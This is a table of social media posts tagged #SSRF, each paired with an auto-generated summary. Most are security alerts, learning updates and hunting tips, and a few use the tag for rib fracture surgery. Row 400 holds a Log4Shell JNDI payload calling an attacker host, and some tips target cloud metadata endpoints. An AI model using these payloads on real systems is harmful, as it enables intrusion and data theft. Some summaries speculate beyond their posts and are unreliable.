| 354 | 2025-05-29 15:28:33 UTC | Day 6 Bug Bounty Focused mostly on recon (same target) Learned more about SSRF with real-world case studies #bugbounty #SSRF #infosec | Day 6 of bug bounty focused on reconnaissance on the same target. The focus was on learning more about Server-Side Request Forgery (SSRF) through real-world case studies. The content highlights the importance of understanding SSRF in the context of bug bounty programs and information security. #bugbounty #SSRF #infosec. |
| 355 | 2025-05-29 08:23:25 UTC | High severity #SSRF in mcp-markdownify-server (CVE-2025-5276) lets attackers access internal resources via Markdownify.get(). Patch now! Details: radar.offseq.com/threat/cve-202 #OffSeq #cybersecurity #infosec | A high severity Server-Side Request Forgery (SSRF) vulnerability in mcp-markdownify-server (CVE-2025-5276) allows attackers to access internal resources through Markdownify.get(). Immediate patching is advised. More information available at radar.offseq.com/threat/cve-2025-5276. #OffSeq #cybersecurity #infosec. |
| 356 | 2025-05-29 01:23:43 UTC | Just dropped NovaLure! My new Python OAST scanner that automates specific Blind SSRF & other out-of-band checks using Interactsh. Great for bug bounty hunters! #OAST #SSRF #BugBounty #InfoSec #PythonTool #CyberSecurity | NovaLure is a new Python OAST scanner designed for automating Blind SSRF and out-of-band checks using Interactsh. It is beneficial for bug bounty hunters and focuses on cybersecurity. The tool aims to enhance security testing processes and improve efficiency in bug hunting activities. #OAST #SSRF #BugBounty #InfoSec #PythonTool #CyberSecurity. |
| 357 | 2025-05-26 12:13:40 UTC | SSRF Hunting 101: Try injecting URLs into parameters! Look for image uploads URL shorteners or anything that fetches data from a provided address. Test with internal IPs (127.0.0.1) cloud metadata endpoints and your own server. #SSRF #WebSecurity | The content discusses SSRF hunting tips, suggesting injecting URLs into parameters to exploit vulnerabilities. It advises testing with internal IPs, cloud metadata endpoints, and personal servers. Key points include looking for image uploads, URL shorteners, and data fetching mechanisms. The content emphasizes the importance of web security and using these techniques to identify and prevent SSRF attacks. #SSRF #WebSecurity |
| 358 | 2025-05-26 10:13:20 UTC | Understand critical web vulnerabilities and how to prevent them. Read now techoral.com/security/web-v #CyberSecurity #WebSecurity #XSS #CSRF #SSRF #OWASP #BugBounty #InfoSec #WebDev | The content discusses the importance of understanding critical web vulnerabilities like XSS, CSRF, and SSRF, and how to prevent them. It emphasizes the significance of cybersecurity, web security, and provides resources for further reading. The content also mentions OWASP, Bug Bounty programs, and the intersection of information security and web development. It encourages readers to visit techoral.com/security/web-v for more information on these topics. |
| 359 | 2025-05-25 12:08:31 UTC | Revised the SSRF module on TryHackMe! Gaining a deeper understanding of Server-Side Request Forgery. #tryhackme #SSRF #websecurity #bugbounty #infosec via @realtryhackme | The content discusses the revision of the SSRF module on TryHackMe, emphasizing gaining a deeper understanding of Server-Side Request Forgery. The post highlights the importance of web security, bug bounty programs, and information security. It encourages individuals to engage with the updated module to enhance their knowledge and skills in this area. The content is shared via TryHackMe's official platform, aiming to educate and raise awareness about SSRF vulnerabilities and defenses. |
| 360 | 2025-05-25 11:04:10 UTC | If you are interested in #ChestWall #Injury #Trauma #RibFractures #SSRF #costalcartilage #sternum #Ribs #thoracictrauma #SRS #SlippingRibSyndrome and are not following @CWISociety on #LinkedIn then you should! | The content promotes following @CWISociety on LinkedIn for updates on chest wall injuries, trauma, rib fractures, slipping rib syndrome, and related topics. It emphasizes the importance of staying informed about these issues by following the society's updates on LinkedIn. |
| 361 | 2025-05-24 08:48:41 UTC | CVE-2025-4123: Critical Grafana vulnerability! Path traversal Open Redirect XSS/SSRF chain CVSS: 7.6 | No auth required POC: /public/..%2F%.. Full demo: #CVE2025 #Grafana #BugBounty #SSRF #XSS | A critical Grafana vulnerability, CVE-2025-4123, allows path traversal, leading to Open Redirect, XSS, and SSRF chain. The CVSS score is 7.6, and no authentication is needed. A proof of concept is provided at /public/..%2F%.. Full demo available. This issue is significant for Grafana security and is being highlighted with relevant hashtags like #CVE2025, #Grafana, #BugBounty, #SSRF, and #XSS. |
| 362 | 2025-05-24 07:43:15 UTC | CWIS Budapest is underway! #chestwallinjury #SSRF @zmbauman @DavidSutori @dotu3535 @sawhitbe | CWIS Budapest is currently happening, focusing on chest wall injuries and SSRF. Participants include @zmbauman, @DavidSutori, @dotu3535, and @sawhitbe. Stay updated on the event by following the hashtag #chestwallinjury and #SSRF. |
| 363 | 2025-05-23 05:38:44 UTC | #Cycatz #cybersecurity SSRF & Account Takeover More... #cyberattacksurfacemanagement #darkwebmonitoring #SurfaceWebMonitoring #mobilesecurity #emailsecurity #cloudsecurity #riskregister #vendorriskmanagement #brandmonitoring #incedentreport #SSRF #ATO | The content discusses #Cycatz #cybersecurity focusing on Server-Side Request Forgery (SSRF) and Account Takeover (ATO). It also mentions various cybersecurity aspects like cyber attack surface management, dark web monitoring, mobile security, email security, cloud security, risk register, vendor risk management, brand monitoring, and incident reporting. The post seems to highlight the importance of these cybersecurity measures in protecting against threats like SSRF and ATO. |
| 364 | 2025-05-23 05:38:44 UTC | APT Labs Challenge #3 is LIVE! UNC2903: Metadata Abuse via Adminer (SSRF Attack) a FREE hands-on challenge for serious offensive security learners. Access now: #CyberSecurity #SSRF #InfinityLearning #APTChallenge #CyberWarFareLabs #RedTeamOps | APT Labs Challenge #3, UNC2903, focuses on Metadata Abuse via Adminer (SSRF Attack). It is a free hands-on challenge for serious offensive security learners. Participants can access the challenge now. The content emphasizes cybersecurity, SSRF, Infinity Learning, APTChallenge, CyberWarFareLabs, and RedTeamOps. |
| 365 | 2025-05-22 18:33:53 UTC | How is this usually avoided #bugbounty #ssrf #hackerone | The content discusses avoiding security vulnerabilities like Server-Side Request Forgery (SSRF) in bug bounty programs, particularly on platforms like HackerOne. It highlights the importance of preventing such issues and hints at strategies or techniques to mitigate them. The post likely provides insights or tips on how to steer clear of SSRF vulnerabilities in bug bounty programs, emphasizing the significance of security measures in these contexts. |
| 366 | 2025-05-22 16:33:29 UTC | How does your app fetch resources? CWE-918 (SSRF) lets attackers trick your server into fetching malicious URLs putting internal systems at risk. Train your team against SSRF the full CWE Top 25: ow.ly/19kN50VWx1c #CWE #SSRF #appsec #devsecops #cybersecurity | The content highlights the risk of attackers using Server-Side Request Forgery (SSRF) to trick servers into fetching malicious URLs, potentially compromising internal systems. It emphasizes the importance of training teams to defend against SSRF and provides a link to the full CWE Top 25 list for cybersecurity awareness. The post encourages awareness of app security, development operations, and cybersecurity measures. |
| 367 | 2025-05-22 15:38:04 UTC | .svc.cluster.local is the new 169.254.169.254 #bugbounty #ssrf | The content highlights that *.svc.cluster.local is being identified as a new target similar to 169.254.169.254 for bug bounty programs and SSRF (Server-Side Request Forgery) vulnerabilities. This information suggests that *.svc.cluster.local may be exploited in a manner similar to how 169.254.169.254 has been targeted in the past. The post likely contains further details or insights on this emerging issue. |
| 368 | 2025-05-22 13:33:32 UTC | New CVE : CVE-2025-4123 Grafana open redirect XSS/SSRF via path traversal Detect it now with Nuclei template #infosec #cve #nuclei #grafana #ssrf #xss #openredirect | A new CVE, CVE-2025-4123, highlights a vulnerability in Grafana that allows open redirect, XSS, and SSRF via path traversal. The issue can be detected using Nuclei template. The post emphasizes the importance of addressing this security concern in Grafana. #infosec #cve #nuclei #grafana #ssrf #xss #openredirect. |
| 369 | 2025-05-22 08:33:52 UTC | Analyse approfondi de @davidbombal sur les Vulnérabilités SSRF et les techniques d'exploitation Shared by Clipsy: 𝗩𝘂𝗹𝗻é𝗿𝗮𝗯𝗶𝗹𝗶𝘁é𝘀 #𝗦𝗦𝗥𝗙 𝗲𝘁 𝘁𝗲𝗰𝗵𝗻𝗶𝗾𝘂𝗲𝘀 𝗱'𝗲𝘅𝗽𝗹𝗼𝗶𝘁𝗮𝘁𝗶𝗼𝗻 : 𝗔𝗻𝗮𝗹𝘆𝘀𝗲 𝗮𝗽𝗽𝗿𝗼𝗳𝗼𝗻𝗱𝗶𝗲 | The content discusses an in-depth analysis by @davidbombal on SSRF vulnerabilities and exploitation techniques. It is shared by Clipsy and focuses on understanding and applying SSRF vulnerabilities. The content likely provides insights, strategies, and practical knowledge related to identifying and exploiting SSRF vulnerabilities in systems or applications. It emphasizes the importance of being informed and proactive in addressing these security risks. |
| 370 | 2025-05-22 04:33:47 UTC | SSRF Hunting 101: Force the server to make requests to internal resources (like localhost or internal IPs) via URL parameters. If it echoes the response you've likely found SSRF! #SSRF #WebSecurity | The content discusses SSRF (Server-Side Request Forgery) hunting by manipulating URL parameters to force the server to make requests to internal resources like localhost or internal IPs. If the server echoes the response, it indicates a potential SSRF vulnerability. This technique is essential for identifying security flaws and enhancing web security. #SSRF #WebSecurity. |
| 371 | 2025-05-21 17:28:54 UTC | Lorenzo Gallegos presents 'How to Write Secure Code' July 25th at Nebraska.Code(). #SecureCode #OWASP #SQLi #XSS #CSRF #SSRF #Nebraska #TechConf @Mattermost @Bluum_Tech @PapaJohns @scooterscoffee @Runza @HyVee #IT @caseysgenstore @midlandcode @OmahaSSUG | Lorenzo Gallegos will discuss 'How to Write Secure Code' at Nebraska.Code() on July 25th. The presentation will cover topics like #SecureCode, #OWASP, #SQLi, #XSS, #CSRF, and #SSRF. The event is relevant for those interested in IT security and will feature sponsors like @Mattermost, @Bluum_Tech, @PapaJohns, @scooterscoffee, @Runza, @HyVee, @caseysgenstore, @midlandcode, and @OmahaSSUG. Attendees can gain insights into writing secure code and network with industry professionals. |
| 372 | 2025-05-21 17:28:52 UTC | Lorenzo Gallegos presents 'How to Write Secure Code' July 25th at Nebraska.Code(). #SecureCode #OWASP #SQLi #XSS #CSRF #SSRF #Nebraska #TechnologyConference @605SQL @blendtweets @bankeasy_FBT @DEFCON402 @OmahaMakerGroup @wedontcoast @Ameritas | Lorenzo Gallegos will be presenting 'How to Write Secure Code' at Nebraska.Code() on July 25th. The event will cover topics such as secure coding practices, OWASP, SQLi, XSS, CSRF, and SSRF. The presentation will take place at a technology conference in Nebraska, with various organizations tagged in the announcement. Attendees can expect insights on writing secure code and protecting against common vulnerabilities. |
| 373 | 2025-05-21 05:28:07 UTC | #Cycatz #cybersecurity Full-Blown SSRF More... shorturl.at/XpwHj #cyberattacksurfacemanagement #darkwebmonitoring #SurfaceWebMonitoring #emailsecurity #cloudsecurity #governanceriskcompliance #riskregister #vendorriskmanagement #brandmonitoring #incedentreport #ssrf | The content discusses various cybersecurity topics including SSRF, cyber attack surface management, dark web monitoring, email security, cloud security, governance risk compliance, risk register, vendor risk management, brand monitoring, and incident reporting. It emphasizes the importance of these aspects in maintaining cybersecurity and provides a link for further information. |
| 374 | 2025-05-17 16:13:41 UTC | @niksthehacker used the built-in screenshot generation to trigger SSRF and redirected the target to a crafted domain that captured internal data as a screenshot. #BugBounty #BBV #DEFCON #AWS #SSRF | @niksthehacker leveraged the built-in screenshot feature to exploit SSRF, redirecting the target to a controlled domain to capture sensitive internal data as a screenshot. This technique was used in a bug bounty scenario and shared on social media with relevant hashtags like #BugBounty, #BBV, #DEFCON, #AWS, and #SSRF. |
| 375 | 2025-05-17 04:13:15 UTC | SSRF Hunting 101: Spot SSRF by manipulating URLs & parameters! Try injecting internal IPs (127.0.0.1 169.254.169.254) or internal hostnames where the server fetches data. See what secrets you can grab! #SSRF #WebSecurity | The content discusses SSRF (Server-Side Request Forgery) hunting techniques. It suggests manipulating URLs and parameters to identify SSRF vulnerabilities by injecting internal IPs (127.0.0.1, 169.254.169.254) or internal hostnames. The goal is to uncover secrets by exploiting SSRF. The post emphasizes the importance of web security and provides a link for further information. |
| 376 | 2025-05-16 22:13:04 UTC | SonicWall confirmó una vulnerabilidad de tipo Server-Side Request Forgery (SSRF) usando URLs codificadas Afecta a dispositivos SMA 1000 (incluyendo 6210 7200 7210 8200v y CMS). #SonicWall #SSRF | SonicWall has confirmed a Server-Side Request Forgery (SSRF) vulnerability using encoded URLs affecting SMA 1000 devices (including 6210, 7200, 7210, 8200v, and CMS). This vulnerability poses a security risk. #SonicWall #SSRF. |
| 377 | 2025-05-16 21:13:29 UTC | Urgent: SonicWall SMA1000 series vulnerability (CVE-2025-40595) allows remote exploitation via encoded URLs. Update firmware to 12.4.3-02963 immediately. #CyberSecurity #SonicWall #SSRF thedailytechfeed.com/critical-vulne | An urgent vulnerability (CVE-2025-40595) in SonicWall SMA1000 series allows remote exploitation via encoded URLs. Immediate action is needed to update firmware to version 12.4.3-02963 to mitigate the risk. This issue highlights the importance of cybersecurity measures and protection against Server-Side Request Forgery (SSRF) attacks. For more information, visit thedailytechfeed.com/critical-vulne. |
| 378 | 2025-05-16 18:13:46 UTC | 2/2 | Check it out here: tryhackme.com/room/ssrfqi?ut #tryhackme via @RealTryHackMe #ssrf #hacksei | The content is promoting a room on TryHackMe related to Server-Side Request Forgery (SSRF) with a shortened link provided. It encourages users to check it out on the TryHackMe website. The post includes hashtags for TryHackMe, SSRF, and Hacksei. The content is shared via the RealTryHackMe Twitter account. |
| 379 | 2025-05-16 18:13:46 UTC | 1/2 | Happy to complete the #SSRF vuln room on #tryhackme. MAN I LOVE THIS ROOM! I mean I've a long road ahead but I WILL MASTER THIS VULN! Lessons Learned: 1. Types of SSRF. 2. Ways to find SSRF vulns. 3. SSRF defends & ways to bypass them. 4. Deny/Allow List Open Redirect. | The content discusses completing an SSRF vulnerability room on TryHackMe, expressing enthusiasm and determination to master the vulnerability. Key takeaways include learning about types of SSRF, methods to identify SSRF vulnerabilities, defenses against SSRF attacks, and ways to bypass them. Additionally, it mentions Deny/Allow List and Open Redirect as important concepts. The individual is excited about the progress made and the knowledge gained in this area of cybersecurity. |
| 380 | 2025-05-16 12:13:19 UTC | SSRF hunting? Force your server to make requests to internal resources (like localhost or internal IPs) via manipulated URLs/parameters. If it echoes back you've likely found a vulnerability! #SSRF #WebSec | This content discusses SSRF (Server-Side Request Forgery) hunting by manipulating URLs/parameters to force a server to make requests to internal resources like localhost or internal IPs. If the server echoes back the requested information, it may indicate a vulnerability. The post emphasizes the importance of testing for SSRF vulnerabilities in web security. #SSRF #WebSec. |
| 381 | 2025-05-16 10:02:27 UTC | SonicWall SMA1000 Vulnerability Let Attackers to Exploit Encoded URLs To Gain Internal Systems Access Remotely | A vulnerability in SonicWall SMA1000 allows attackers to exploit encoded URLs, gaining remote access to internal systems. This security flaw poses a risk of unauthorized access and potential data breaches. Organizations using SonicWall SMA1000 should be aware of this issue and take necessary precautions to protect their systems and data from exploitation. Regular security updates and patches should be applied to mitigate the risk of such vulnerabilities being exploited by malicious actors. |
| 382 | 2025-05-15 05:13:23 UTC | #Cycatz #cybersecurity Exceptional SSRF Finding More... #cyberattacksurfacemanagement #SurfaceWebMonitoring #mobilesecurity #emailsecurity #cloudsecurity #governanceriskcompliance #riskregister #vendorriskmanagement #brandmonitoring #incedentreport #SSRF | The content discusses an exceptional Server-Side Request Forgery (SSRF) finding related to cybersecurity. It also mentions various cybersecurity topics such as cyber attack surface management, web monitoring, mobile security, email security, cloud security, governance risk compliance, risk register, vendor risk management, brand monitoring, and incident reporting. The content seems to emphasize the importance of SSRF and various cybersecurity measures. |
| 383 | 2025-05-13 13:04:00 UTC | Server-Side Request Forgery (SSRF) A web app flaw where servers are tricked into making internal requests via user input exposing sensitive systems. #azefox #azefoxinnovations #CyberSecurity #SSRF #WebSecurity #InfoSec #EthicalHacking | The content discusses Server-Side Request Forgery (SSRF), a web app vulnerability where servers are manipulated into making internal requests through user input, potentially revealing sensitive systems. The post emphasizes the importance of cybersecurity, web security, and ethical hacking in addressing SSRF risks. The hashtags #azefox, #azefoxinnovations, #CyberSecurity, #SSRF, #WebSecurity, #InfoSec, and #EthicalHacking are used to categorize and promote the content. |
| 384 | 2025-05-13 07:58:20 UTC | New Blog Alert! Learn the Best 7 Ways to Prevent SSRF Vulnerability in React.js with real-world coding examples security tips. Read more: #ReactJS #CyberSecurity #WebSecurity #SSRF #JavaScript #OWASP #InfoSec #DevSecOps #WebDev #Pentesting #AppSec | A new blog discusses 7 ways to prevent SSRF vulnerability in React.js with coding examples and security tips. The content covers React.js security measures, real-world coding practices, and tips to enhance web security. The blog addresses SSRF vulnerability prevention, JavaScript security, OWASP guidelines, information security, DevSecOps practices, web development, pentesting, and application security. Readers can find detailed insights and recommendations on safeguarding React.js applications against SSRF threats. |
| 385 | 2025-05-12 20:58:27 UTC | Finally got this one published! #cwis #ssrf | The author is excited to announce the publication of their work, using hashtags #cwis and #ssrf. The link provided likely directs to the published content. |
| 386 | 2025-05-12 19:58:52 UTC | Frankenplating at cwis! #cwis #ssrf #ribs | The content mentions "Frankenplating at cwis" and includes hashtags like #cwis, #ssrf, and #ribs. It seems to refer to a topic related to combining different elements or components, possibly in a creative or unconventional way. The link provided may lead to more detailed information on the topic. |
| 387 | 2025-05-12 07:58:43 UTC | New Writeup Alert! "SSRF via PDF Generator? Yes and It Led to EC2 Metadata Access" by Abhijeet Kumawat is now live on IW! Check it out here: #infosec #hacking #ssrf #bugbounty #ssrfattack | Abhijeet Kumawat's new writeup on SSRF via a PDF generator leading to EC2 metadata access is now live on IW. The content discusses a security vulnerability related to SSRF attacks. It highlights the potential risks and implications of exploiting this vulnerability. Readers interested in information security, hacking, bug bounty programs, and SSRF attacks can find valuable insights in the writeup. The link provided directs users to the detailed content for further exploration. |
| 388 | 2025-05-10 12:53:17 UTC | A critical SSRF flaw in Microsoft Power Apps (CVE-2025-47733) puts internal data at risk. No auth needed. High CVSS: 9.1. Read how to protect your org now: #CyberSecurity #SSRF #Microsoft #InfoSec | A critical SSRF flaw in Microsoft Power Apps (CVE-2025-47733) poses a high risk to internal data without authentication. The vulnerability has a CVSS score of 9.1, emphasizing its severity. Organizations are urged to take immediate steps to protect their data and systems against potential exploitation. The content highlights the importance of cybersecurity measures and provides guidance on safeguarding against SSRF vulnerabilities in Microsoft products. #CyberSecurity #SSRF #Microsoft #InfoSec. |
| 389 | 2025-05-08 10:28:22 UTC | Completed Server-Side Vulnerabilities Learning Path at PortSwigger Thrilled to finish PortSwigger's Server-Side Vulnerabilities path gaining insight into web system exploits. #WebSecurity #CyberSec #PortSwigger #Learning #SQLInjection #SSRF #Auth #Vulns | The content highlights the completion of the Server-Side Vulnerabilities Learning Path at PortSwigger, expressing excitement at gaining insights into web system exploits like SQL injection, SSRF, and authentication vulnerabilities. The individual is thrilled to finish the learning path and shares hashtags related to web security, cybersecurity, learning, and PortSwigger. |
| 390 | 2025-05-07 04:23:13 UTC | SSRF hunting? Try manipulating URLs the server fetches! Look for input fields that dictate server-side requests (e.g. image URLs file imports). Can you make it access internal resources or external sites? #SSRF #WebSecurity | The content discusses SSRF hunting by manipulating URLs that servers fetch. It suggests looking for input fields controlling server-side requests like image URLs or file imports. The goal is to see if these manipulations can access internal resources or external sites, emphasizing the importance of web security. The content encourages exploring these techniques for identifying and mitigating SSRF vulnerabilities. |
| 391 | 2025-05-06 16:18:31 UTC | Day 21/30 Web Fundamentals File Inclusion Intro to SSRF Tough but rooms today! Hands-on with LFI RFI & internal web request attacks. Learning never stops on @TryHackMe #TryHackMe #WebHacking #CyberSecurity #Day21 #SSRF #FileInclusion #InfoSec #THM #LearningInPublic | Day 21/30 of Web Fundamentals covers File Inclusion and an introduction to SSRF. Participants engage in challenging activities involving LFI, RFI, and internal web request attacks on @TryHackMe. The learning journey continues with a focus on cybersecurity and web hacking. #TryHackMe #CyberSecurity #SSRF #FileInclusion #InfoSec #THM #LearningInPublic. |
| 392 | 2025-05-05 19:14:13 UTC | Hackers are exploiting email input fields to launch XSS SSRF and header injection attacks. Ensure robust validation and sanitization to protect your applications. #CyberSecurity #XSS #SSRF #EmailSecurity thedailytechfeed.com/hackers-exploi | Hackers are targeting email input fields to carry out XSS, SSRF, and header injection attacks. Robust validation and sanitization measures are crucial to safeguard applications. Ensuring proper security protocols can help prevent these cyber threats. #CyberSecurity #XSS #SSRF #EmailSecurity. |
| 393 | 2025-05-05 16:02:02 UTC | Hackers Leveraging Email Input Fields to Exploit Vulnerabilities Ranging from XSS to SSRF | Hackers are exploiting vulnerabilities in email input fields, including cross-site scripting (XSS) and server-side request forgery (SSRF). By manipulating email input fields, attackers can execute malicious code or access sensitive information. These vulnerabilities pose significant risks to organizations and individuals. It is crucial to implement robust security measures to protect against such attacks and regularly update systems to patch any potential vulnerabilities. |
| 394 | 2025-05-05 12:26:17 UTC | Hackers Exploit Email Fields to Launch XSS and SSRF Attacks | Hackers are using email fields to launch XSS (Cross-Site Scripting) and SSRF (Server-Side Request Forgery) attacks. By manipulating email fields, attackers can inject malicious code into websites or trick servers into making unauthorized requests. These attacks can lead to data breaches, unauthorized access, and other security threats. Organizations should implement security measures to protect against these exploits, such as input validation, sanitization of user inputs, and monitoring for suspicious activities in email fields. Vigilance and proactive security measures are crucial to prevent these types of attacks. |
| 395 | 2025-05-05 12:26:15 UTC | New SonicBoom Attack Allows Bypass of Authentication for Admin Access | A new attack called SonicBoom allows bypassing authentication for admin access. The attack exploits vulnerabilities to gain unauthorized access without proper authentication. This security threat poses risks to systems and data integrity by granting unauthorized users admin privileges. It highlights the importance of implementing robust security measures to prevent such attacks and protect sensitive information from unauthorized access. |
| 396 | 2025-05-05 08:18:22 UTC | #TodayILearned #ssrf AI is so good for educating myself: Q: provide SSRF basic example - Server side request forgery A: | The content discusses using AI to learn about SSRF (Server Side Request Forgery). The focus is on educating oneself about SSRF through AI assistance. The post mentions providing a basic example of SSRF and includes a link for further reference: https://ift.tt/oPMUNsT. |
| 397 | 2025-05-04 20:18:11 UTC | Test for SSRF: Can your server be tricked into making requests to internal/external resources you don't intend? Try manipulating URLs/parameters to point to internal IPs (127.0.0.1 192.168.x.x) or your own controlled server. See what happens! #SSRF #WebSecurity | The content discusses testing for Server-Side Request Forgery (SSRF) by manipulating URLs/parameters to make servers unknowingly access internal/external resources. It suggests trying to point requests to internal IPs like 127.0.0.1 or 192.168.x.x, or a controlled server to see if the server can be tricked. This test helps identify vulnerabilities in web security related to SSRF. #SSRF #WebSecurity. |
| 398 | 2025-05-03 20:08:23 UTC | The sneaky vuln letting attackers trick servers into hitting internal resources! Poor input validation (e.g. URLs) can expose databases or localhost. Seen in a form I analyzedcheck the pic! Prevent it: validate inputs whitelist domains. Thoughts? #Cybersecurity #SSRF | The content discusses a vulnerability that allows attackers to trick servers into accessing internal resources by exploiting poor input validation, such as URLs. The vulnerability, known as Server-Side Request Forgery (SSRF), can expose databases or localhost. To prevent this, it is recommended to validate inputs and whitelist domains. The post emphasizes the importance of cybersecurity measures to protect against SSRF attacks. |
| 399 | 2025-05-02 09:03:31 UTC | CYBERSECURITY ALERT! Join our FREE class on: OWASP Top 10: SSRF Risks Sat May 3 | 10AM GMT1 | Zoom Trainer: Amos Ologboshere Join: #Cybersecurity #SSRF #OWASP #FreeTraining | A free cybersecurity class on OWASP Top 10: SSRF Risks is being offered on Saturday, May 3 at 10AM GMT+1 via Zoom. The trainer is Amos Ologboshere. The class aims to educate participants on security risks related to Server-Side Request Forgery (SSRF). Interested individuals can join the session by using the provided link. The event is promoted with hashtags #Cybersecurity, #SSRF, #OWASP, and #FreeTraining. |
| 400 | 2025-05-02 01:58:38 UTC | 1/ Un atacante envía esto a tu app: $ {jndi:ldap://attacker.oastify.com} (sin espacio real) Tu servidor lo procesa Y sin mostrar nada hace una conexión externa. Información filtrada sin que nadie lo note. #Log4Shell #SSRF #BlindRCE | The content warns about a security vulnerability where an attacker can send a malicious payload to a server, causing it to make an external connection without displaying anything, potentially leaking sensitive information. This exploit involves the Log4Shell, SSRF, and BlindRCE techniques. The payload example is $ {jndi:ldap://attacker.oastify.com}. It emphasizes the risk of data leakage without detection. |
| 401 | 2025-04-30 23:04:07 UTC | SSRF in Oracle Services SSRF tricks your backend into leaking internal data. Web3 targets: Oracle price feeds NFT metadata Bridge endpoints Example: ... Exposes cloud creds attacker controls signers or nodes. #SSRF #DeFi | The content discusses Server-Side Request Forgery (SSRF) vulnerabilities in Oracle Services, which can be exploited to leak internal data. Web3 targets such as Oracle price feeds, NFT metadata, and Bridge endpoints are at risk. An example is provided where SSRF exposes cloud credentials, allowing attackers to control signers or nodes. The post emphasizes the importance of addressing SSRF vulnerabilities in the context of decentralized finance (#DeFi). |
| 402 | 2025-04-30 16:53:32 UTC | It was good to use today at last the @CWISociety C-QoL #QualityOfLife Questionnaire for #ChestWallInjury #RibFractures #SSRF. We need to collect #PROMS & #PREMS systematically whilst we continue to explore indications benefits complications and late effects (in this case). | Today, the @CWISociety C-QoL questionnaire was used for Chest Wall Injury, Rib Fractures, and SSRF. The focus is on collecting PROMS & PREMS systematically to understand indications, benefits, complications, and late effects. This data will help in exploring these aspects further. |
| 403 | 2025-04-29 09:58:43 UTC | SSRF Vulnerability in Symfony? Learn how attackers exploit it & how to fix it with real code examples. Boost your web app security now! #CyberSecurity #Symfony #SSRF #WebSecurity #BugBounty #OWASP #DevSecOps #Pentesting #Infosec #SecureCoding | The content discusses the SSRF vulnerability in Symfony, explaining how attackers exploit it and providing solutions with real code examples to enhance web app security. It emphasizes the importance of addressing this vulnerability to protect against cyber threats. The post includes hashtags related to cybersecurity, Symfony, SSRF, web security, bug bounty, OWASP, DevSecOps, pentesting, infosec, and secure coding. It offers a link for further information and encourages readers to take action to secure their web applications. |
| 404 | 2025-04-29 06:53:23 UTC | Advanced SSRF Challenge! Credit - @Cyber__Anna Can you find a way to fetch internal metadata? Drop your bypass tricks in the comments! #SSRF #BugBounty #InfoSec | The content is about an advanced Server-Side Request Forgery (SSRF) challenge posted by @Cyber__Anna. Participants are encouraged to find a method to retrieve internal metadata and share their bypass techniques in the comments. The challenge is related to cybersecurity topics such as SSRF, Bug Bounty, and Information Security. It invites individuals to test their skills in identifying vulnerabilities and bypassing security measures. |
| 405 | 2025-04-28 12:48:36 UTC | SSRF Hunting 101: Force the server to make requests to internal resources or external URLs it shouldn't. Think: localhost internal IPs cloud metadata endpoints. Look for URL parameters and data that control server-side requests. Test test test! #SSRF #WebSecurity | The content discusses SSRF (Server-Side Request Forgery) hunting basics, emphasizing forcing servers to make unauthorized requests to internal or external resources like localhost, internal IPs, and cloud metadata endpoints. It suggests focusing on URL parameters and data that influence server-side requests and emphasizes thorough testing. The post encourages testing for SSRF vulnerabilities to enhance web security. #SSRF #WebSecurity. |
| 406 | 2025-04-28 11:11:14 UTC | How Breaches Start: Breaking Down 5 Real Vulns | The content discusses how data breaches begin by breaking down five real vulnerabilities. It likely explores common weaknesses that cyber attackers exploit to gain unauthorized access to systems or data. Understanding these vulnerabilities can help organizations strengthen their cybersecurity defenses and prevent breaches. The content may provide insights into specific vulnerabilities and offer recommendations on how to mitigate these risks effectively. |
| 407 | 2025-04-26 13:43:18 UTC | My first @CWISociety meeting in the books! Alpacas and my @GWSMHS mentor #CWIS President @saranimd who inspired me to become a trauma surgeon & pursue #SSRF as an option for my patients Celebrating surgical mentorship for all learners Advanced chest wall cadaver course | The content describes attending the first meeting of the CWISociety, where the individual was inspired by their mentor to become a trauma surgeon and explore SSRF for patients. The meeting included discussions on surgical mentorship for learners and participation in an advanced chest wall cadaver course. The post also mentions alpacas and the mentor's influence in shaping the individual's career aspirations. |
| 408 | 2025-04-25 17:51:36 UTC | Critical Commvault SSRF could allow attackers to execute code remotely | A critical Server-Side Request Forgery (SSRF) vulnerability in Commvault software could enable attackers to remotely execute code. This flaw poses a significant security risk as it allows malicious actors to manipulate server requests and potentially gain unauthorized access to systems. Organizations using Commvault software should promptly address this vulnerability to prevent exploitation and unauthorized code execution. |
| 409 | 2025-04-25 08:43:15 UTC | A critical SSRF vulnerability has been found in Moodle 4.4.3 via a TOC-TOU flaw in URL handling. Enables attackers to access internal services & even escalate to RCE. Details threatsbank.com/moodle-ssrf-vu #infosec #Moodle #CyberSecurity #SSRF | A critical SSRF vulnerability in Moodle 4.4.3 allows attackers to access internal services and potentially escalate to Remote Code Execution (RCE) due to a TOC-TOU flaw in URL handling. More information can be found at threatsbank.com/moodle-ssrf-vu. This issue poses a significant threat to information security and highlights the importance of addressing vulnerabilities promptly. #infosec #Moodle #CyberSecurity #SSRF |
| 410 | 2025-04-24 12:33:48 UTC | Smoking Screaming Rubber Fish #SSRF AwiGhAQ8vZsv8ndSv3HCqcLrRh2UWdRXtPpdS8Kxpump Send to millions! | The content promotes the Smoking Screaming Rubber Fish #SSRF with a specific code to send to millions. The link provided directs to further information or promotion related to the product or campaign. |
| 411 | 2025-04-24 11:26:32 UTC | Critical Commvault Command Center Flaw Enables Attackers to Execute Code Remotely | A critical flaw in Commvault Command Center allows attackers to remotely execute code. This vulnerability poses a significant security risk as it can be exploited by malicious actors to compromise systems. Organizations using Commvault Command Center should be aware of this flaw and take immediate action to mitigate the risk of unauthorized code execution on their systems. |
| 412 | 2025-04-22 07:28:17 UTC | A critical #SSRF vulnerability (CVE-2025-29446) found in Open-WebUI v0.5.16 lets attackers manipulate internal requests via malformed URLs. Read how it works and how to patch threatsbank.com/critical-ssrf- #CyberSecurity #OpenWebUI #CVE2025 | A critical SSRF vulnerability (CVE-2025-29446) in Open-WebUI v0.5.16 allows attackers to manipulate internal requests using malformed URLs. The article explains the vulnerability and provides guidance on patching it. For more details, visit threatsbank.com/critical-ssrf-. #CyberSecurity #OpenWebUI #CVE2025. |
| 413 | 2025-04-20 19:13:30 UTC | Ask any Web App pentester: It can be tricky to demonstrate Server-Side Request Forgery (#SSRF) impact. Alex fortunately has a few shortcuts that can help you out as you exploit this vulnerability. Do you have any tips and tricks you use when you find SSRF? Drop them in the | Demonstrating Server-Side Request Forgery (SSRF) impact can be challenging for Web App pentesters. Alex shares shortcuts to exploit this vulnerability effectively. Readers are encouraged to share their own tips and tricks for dealing with SSRF. |
